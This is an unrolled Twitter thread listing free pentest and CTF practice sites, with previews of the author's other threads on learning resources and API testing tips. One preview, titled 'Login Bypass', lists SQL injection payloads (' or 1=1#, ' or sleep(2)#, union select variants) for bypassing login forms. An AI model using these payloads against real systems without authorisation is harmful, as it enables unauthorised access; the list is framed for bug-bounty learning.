Share this page!

Abhishek Meena Profile picture
Twitter logo
Oct 22 8 tweets 9 min read
FREE LABS TO TEST YOUR PENTEST/CTF SKILLS

Share with your network and friends.

#cybersecurity #bugbounty #hacking #infosec #bugbountytips #ctf #pentesting

🧵 1/n
· Explotation Education - exploit.education

· Google CTF - capturetheflag.withgoogle.com

· HackTheBox - hackthebox.com

· Hackthis - hackthis.co.uk

· Hacksplaining - hacksplaining.com/lessons

· Hacker101 - ctf.hacker101.com
· Academy Hackaflag BR - hackaflag.com.br

· Attack-Defense - attackdefense.com

· Alert to win - alf.nu/alert1

· CTF Komodo Security - ctf.komodosec.com

· CMD Challenge - cmdchallenge.com
· Practical Pentest Labs - lnkd.in/esq9Yuv5

· Pentestlab - pentesterlab.com

· Penetration Testing Practice Labs -amanhardikar.com/mindmaps/Pract…

*
· PentestIT LAB - lab.pentestit.ru

· PicoCTF - picoctf.com
· Hacker Security - capturetheflag.com.br

· Hacking-Lab - hacking-lab.com

· HSTRIKE - hstrike.com

· ImmersiveLabs - immersivelabs.com

· NewbieContest - newbiecontest.org

· OverTheWire - overthewire.org
· Try Hack Me - tryhackme.com

· Vulnhub - vulnhub.com

· W3Challs - w3challs.com

· WeChall - wechall.net

· Zenk-Security - zenk-security.com
· PWNABLE- pwnable.kr/play.php

· Root-Me- root-me.org

· Root in Jail - rootinjail.com

· SANS Challenger - holidayhackchallenge.com/2021/

· SmashTheStack - smashthestack.org/wargames.html

· The Cryptopals Crypto Challenges - cryptopals.com
That's All For Now
Hope Your Will Like this

I'll come with more and useful content so, make sure to Follow Me .
Good Luck For Future 🙏

• • •

Missing some Tweet in this thread? You can try to force a refresh
 

Keep Current with Abhishek Meena

Abhishek Meena Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @Aacle_

Abhishek Meena Profile picture
Oct 23
27 ways to learn ethical hacking for free:

1. Root Me — Challenges.
2. Stök's YouTube — Videos.
3. Hacker101 Videos — Videos.
4. InsiderPhD YouTube — Videos.
5. EchoCTF — Interactive Learning.
6. Vuln Machines — Videos and Labs.
7. Try2Hack — Interactive Learning.
8. Pentester Land — Written Content.
9. Checkmarx — Interactive Learning.
10. Cybrary — Written Content and Labs.
11. RangeForce — Interactive Exercises.
12. Vuln Hub — Written Content and Labs.
13. TCM Security — Interactive Learning.
14. HackXpert — Written Content and Labs.
15. Try Hack Me — Written Content and Labs.
16. OverTheWire — Written Content and Labs.
17. Hack The Box — Written Content and Labs.
18. CyberSecLabs — Written Content and Labs.
19. Pentester Academy — Written Content and Labs.
20. Bug Bounty Reports Explained YouTube — Videos.
Read 6 tweets
Abhishek Meena Profile picture
Oct 23
List Of My Top 15 Favorite
YouTube Channel

That could help you in
Cyber Security👇🏻

#cybersecurity #bugbounty #bugbountytips #hacking #infosec

Don't Forget To Mension Your's Favourite
1. youtube.com/c/EthicalSharm…
{Ethical Sharmaji}

2.
 youtube.com/c/SpinTheHack
{@thecyberzeel}

3.
 youtube.com/c/Nahamsec

{ @NahamSec }

4.
 youtube.com/c/JohnHammond0…
{ @_JohnHammond }

5.
 youtube.com/user/Computerp…
{ Computer Pile }

6.
 youtube.com/c/RedTeamVilla…
{ Red Team Village }
7.
 youtube.com/c/FarahHawa
{ @Farah_Hawaa }

8.
 youtube.com/channel/UCnSYK…
{ Ankit Chauhan }

9.
 youtube.com/user/TomNomNom…
{ @Tomnonnom }

10.
 youtube.com/c/ITSecurityLa…
{ IT Security Labs }

youtube.com/c/STOKfredrik
{ @stokfredrik }
Read 4 tweets
Abhishek Meena Profile picture
Oct 9
API-Security-Tips

Old version of API tend to be more vulnerable

Saw a call to api/v3/login? Check api/v1/login exists as well It might be more vulnerable

#cybersecurity #hacking #bugbounty #bugbountytips #infosec #APIsecurity

API TIP: 1/10👇🏿✔
Never assume there’s only one way to authenticate to an API! Modern apps have many API endpoints for AuthN: /api/mobile/login | /api/v3/login | /api/magic_link; etc..

Find and test all of them for AuthN problems.

API TIP: 2/10👇🏿✔
SQL Injections used to be extremely common 5-10 years ago, and you could break almost every company?

BOLA (IDOR) is the new epidemic of API security.

As a pentester, if you understand how to exploit it, your glory is guaranteed.

medium.com/@inonst/a-deep…

API TIP: 3/10👇🏿✔
Read 10 tweets
Abhishek Meena Profile picture
Oct 8
Login Bypass 🌵
#SQLi

param='
param="
param=' or 1=1
param=' or 1=0
param=' and 1=1
' or sleep(2) and 1=1#
' or sleep(2)#
admin' and sleep(2)#
' union select sleep(2),null#
' union select sleep(2),null,null,null,null#

#cybersecurity #hacking #bugbountytips #infosec

1/9 👇🏿✔
param=' or 1=1#
param=' or 1=1
param=' or 1=1 //
param= or 1=1#
param=and or 1=1#
param=' or 1=1

This is the most classic, standard first test:

' or '1'='1

Then you have:
-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '

#cybersecurity #hacking #bugbountytips

2/9 👇🏿✔
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x

3/9 👇🏿✔
Read 9 tweets
Abhishek Meena Profile picture
Aug 9
FREE LABS TO TEST YOUR PENTEST/CTF SKILLS

Share with your network and friends.

#cybersecurity #bugbounty #hacking #infosec #bugbountytips #ctf #pentesting

🧵 1/n
· Academy Hackaflag BR - hackaflag.com.br

· Attack-Defense - attackdefense.com

· Alert to win - alf.nu/alert1

· CTF Komodo Security - ctf.komodosec.com

· CMD Challenge - cmdchallenge.com
· Explotation Education - exploit.education

· Google CTF - capturetheflag.withgoogle.com

· HackTheBox - hackthebox.com

· Hackthis - hackthis.co.uk

· Hacksplaining - hacksplaining.com/lessons

· Hacker101 - ctf.hacker101.com
Read 8 tweets
Abhishek Meena Profile picture
Apr 20
Make your own hacking Tool with Python Request Module

#imp
^^\ Full Documentary Python Scripting Request /^^

#cybersecurity
#bugbounty #bugbountytips #hacking

{ docs.python-requests.org/en/master/ }
Beloved Features¶

Requests is ready for today’s web.

> Keep-Alive & Connection Pooling

> International Domains and URLs

> Sessions with Cookie Persistence

> Browser-style SSL Verification

> Automatic Content Decoding

> Basic/Digest Authentication
Elegant Key/Value Cookies
> Elegant Key/Value Cookies

> Automatic Decompression

> Unicode Response Bodies

> HTTP(S) Proxy Support

> Multipart File Uploads

> Streaming Downloads

> Connection Timeouts

> Chunked Requests
.netrc Support
Read 4 tweets

Did Thread Reader help you today?

Support us! We are indie developers!

This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Don't want to be a Premium member but still want to support us?

Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Follow Us on Twitter!

Send Email!

Email the whole thread instead of just a link!

Separate emails with commas

:(